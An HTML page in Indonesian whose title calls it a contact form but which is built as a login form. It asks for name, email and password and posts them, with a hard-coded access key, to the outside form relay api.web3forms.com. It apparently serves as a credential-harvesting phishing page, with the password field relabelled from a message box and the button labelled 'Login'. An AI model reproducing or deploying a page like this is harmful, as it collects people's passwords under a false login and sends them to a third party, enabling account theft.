<!DOCTYPE html>
<html lang="in">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Formulir Kontak yang Lebih Menarik</title>
  <style>
    /* Tambahkan gaya CSS di sini */
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      margin: 10px;
    }
    form {
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.3);
      width: 300px;
      margin: 0 auto;
    }
    label {
      display: block;
      margin-bottom: 5px;
    }
    input[type="text"],
    input[type="email"],
    textarea {
      width: 90%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
    }
    button[type="submit"] {
      background-color: #4CAF50;
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 3px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <form action="https://api.web3forms.com/submit" method="POST">
    <input type="hidden" name="access_key" value="79639a21-bb54-4d4e-8a41-1c1a4dddb72d">
    <label for="name">Nama:</label>
    <input type="text" id="name" name="name" required>
    <label for="email">Email:</label>
    <input type="email" id="email" name="email" required>
    <label for="message">Password:</label>
    <textarea id="message" name="message" rows="1" required></textarea>
    <input type="checkbox" name="botcheck" class="hidden" style="display: none;">
    <button type="submit">Login</button>
  </form>
</body>
</html>